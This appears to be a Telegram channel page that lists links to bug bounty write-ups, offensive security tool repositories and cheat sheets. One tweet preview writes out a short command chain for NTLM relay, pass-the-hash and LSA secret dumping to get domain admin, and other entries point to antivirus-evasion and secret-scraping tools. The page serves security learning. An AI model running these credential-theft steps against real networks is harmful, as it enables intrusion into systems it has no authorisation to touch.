Web Security | Bug hunting
@cybersecurityresources
7.19K
subscribers
46
photos
2
files
473
links
A web penetration testing / General cybersecurity / Network related topics channel that provides direct links for interesting resources and notes.
Download Telegram
Join
Web Security | Bug hunting
7.19K subscribers
Web Security | Bug hunting
https://github.com/ebertti/awesome-telegram
GitHub
GitHub - ebertti/awesome-telegram: Collection great groups, channels, bots and libraries for Telegram
Collection great groups, channels, bots and libraries for Telegram - ebertti/awesome-telegram
Web Security | Bug hunting
https://pastebin.com/SkTLFQ4N
Pastebin
Ehtools Framework Installation - Pastebin.com
Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.
Web Security | Bug hunting
https://githacktools.blogspot.com/2019/01/avet-antivirus-evasion-tool.html
Web Security | Bug hunting
https://medium.com/@danangtriatmaja/bug-bounty-self-xss-clickjacking-good-xss-tokopedia-8df7a65e0955
Medium
[ BUG BOUNTY ] Self XSS + ClickJacking = Good XSS | Tokopedia
Hi sobat, bagaimana kabarnya ? semoga senantiasa sehat selalu dan diberikan kelancaran dalam aktifitasnya. ^-^
Web Security | Bug hunting
https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417
Medium
Graphql Abuse to Steal Anyone’s Address
Introduction
Web Security | Bug hunting
https://twitter.com/nullenc0de/status/1169307702692069376
Twitter
Paul Seekamp
How I got Domain Admin today. Relay creds>SAM dump>PTH> read cleartxt 1) cme smb <CIDR> --gen-relay-list smbrelay.txt 2) ntlmrelayx.py -tf smbrelay.txt 3) Wait for admin hash (500) 4) cme smb <CIDR> -u username -H NTHASH --lsa 5) cat /root/.cme/logs/*.secrets…
Web Security | Bug hunting
https://medium.com/@tarekmohamed_20773/add-new-user-with-admin-permission-and-takeover-the-organization-6318ee10154a
Medium
Add new user with Admin permission and takeover the organization
Taregt : redacted.com
Web Security | Bug hunting
https://github.com/hisxo/gitGraber
GitHub
GitHub - hisxo/gitGraber: gitGraber: monitor GitHub to search and find sensitive data in real time for different online services…
gitGraber: monitor GitHub to search and find sensitive data in real time for different online services such as: Google, Amazon, Paypal, Github, Mailgun, Facebook, Twitter, Heroku, Stripe... - hisxo...
Web Security | Bug hunting
https://blog.usejournal.com/graphql-bug-to-steal-anyones-address-fc34f0374417
Medium
Graphql Abuse to Steal Anyone’s Address
Introduction
Web Security | Bug hunting
https://medium.com/@saadahmedx/complete-web-server-access-46d19279a2b
Medium
Complete Web Server Access
Hi guy I am back with another POC that I found in PRIVATE program on bugcrowd let get started. So let assume the SITE name private.com I…
Web Security | Bug hunting
https://medium.com/@cc1h2e1/write-up-of-two-http-requests-smuggling-ff211656fe7d
Medium
Write up of two HTTP Requests Smuggling
This article about how I found two sites for HTTP Request Smuugling
Web Security | Bug hunting
https://medium.com/@heinthantzin/how-does-my-recon-win-250-in-15-minutes-a1992508b911
Medium
How does my recon win $250 in 15 minutes
Hi there again,
Web Security | Bug hunting
https://medium.com/@jayateerthag/google-referer-leak-bug-434f6293ce66
Medium
GOOGLE REFERER LEAK BUG
I followed the usual Recon process after enumerating subdomains ,
Web Security | Bug hunting
http://tweetedtimes.com/v/1939
Web Security | Bug hunting
cyberscurity books :
https://mega.nz/#F!oawFzJiI!nYW_l4i1a61QtyuS18GnnA
mega.nz
MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 20GB now
Web Security | Bug hunting
https://github.com/BugHunterID/bugbounty-cheatsheet
GitHub
GitHub - BugHunterID/bugbounty-cheatsheet: A list of interesting payloads, tips and tricks for bug bounty hunters.
A list of interesting payloads, tips and tricks for bug bounty hunters. - BugHunterID/bugbounty-cheatsheet
Web Security | Bug hunting
https://github.com/AlexisAhmed/hacker101
GitHub
GitHub - AlexisAhmed/hacker101: Hacker101
Hacker101. Contribute to AlexisAhmed/hacker101 development by creating an account on GitHub.
Web Security | Bug hunting
https://github.com/AlexisAhmed/Awesome-Red-Teaming
GitHub
GitHub - AlexisAhmed/Awesome-Red-Teaming: List of Awesome Red Teaming Resources
List of Awesome Red Teaming Resources. Contribute to AlexisAhmed/Awesome-Red-Teaming development by creating an account on GitHub.
Web Security | Bug hunting
https://medium.com/@akshukatkar/rce-with-flask-jinja-template-injection-ea5d0201b870
Medium
RCE with Flask Jinja Template Injection
I got invite for private program on bugcrowd. Program do not have huge scope , just a single app with lots of features to test. I usually…
Web Security | Bug hunting
https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489
Medium
How to find more IDORs
And maximize their impact while hunting for bugs.
Web Security | Bug hunting
https://medium.com/@unknownuser1806/problems-i-have-faced-in-bug-bounty-3c9d0a679d8b
Medium
Problems I have faced in Bug Bounty
This is my second blog about #bugbounty.You can check out my first blog that is full of resources and content for bug bounty hunters. If…
TWeb.init({scrollToPost:'cybersecurityresources/162'});